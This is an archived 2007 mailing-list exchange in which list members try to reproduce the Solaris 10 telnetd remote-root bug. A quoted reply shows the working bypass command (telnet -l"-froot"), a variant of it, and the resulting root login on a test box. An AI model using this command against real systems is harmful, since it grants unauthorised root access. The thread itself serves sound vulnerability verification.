[geeks] Solaris 10 Remote-Root Exploit
lionel4287 at verizon.net
Mon Feb 12 12:08:46 CST 2007
>From: Doug McLaren <dougmc at frenzied.us>
>Date: 2007/02/12 Mon AM 11:43:48 CST
>To: The Geeks List <geeks at sunhelp.org>
>Subject: Re: [geeks] Solaris 10 Remote-Root Exploit
>On Mon, Feb 12, 2007 at 11:21:13AM -0600, Lionel Peterson wrote:
>| Just a few datapoints - anyone recreate this yet?
GREAT - thanks.
Now, a few questions:
1) Were you logged in as "root" or "non-superuser user"?
2) What is OS of Telent client you are using (Linux, Solaris, etc.)?
3) Is there any logical connection between the two machines (as I understand it "-f" sends credentials to telnetd, I want to make sure there is no connection between the two.
I am curious if you have two machines with identical root passwords when this is successful...
Thanks for the datapoints - I really do appreciate it.
>% telnet -l"-froot" sunspot
>Connected to sunspot.
>Escape character is '^]'.
>Last login: Fri Feb 9 14:37:41 from lenny.vignette.
>Sun Microsystems Inc. SunOS 5.10 Generic January 2005
>It also worked on different accounts as well.
>Now, this box does allow telnets in as root (intentionally, as it's a
>sandbox type box) so maybe that's relevant. It's probably not
>anywhere near up to date on patches either.
>(It also seems to work OK when done with a `telnet -l -froot sunspot',
>for another data point.)
>Doug McLaren, dougmc at frenzied.us
>Kill -9 'em all, let root at localhost sort 'em out.
More information about the geeks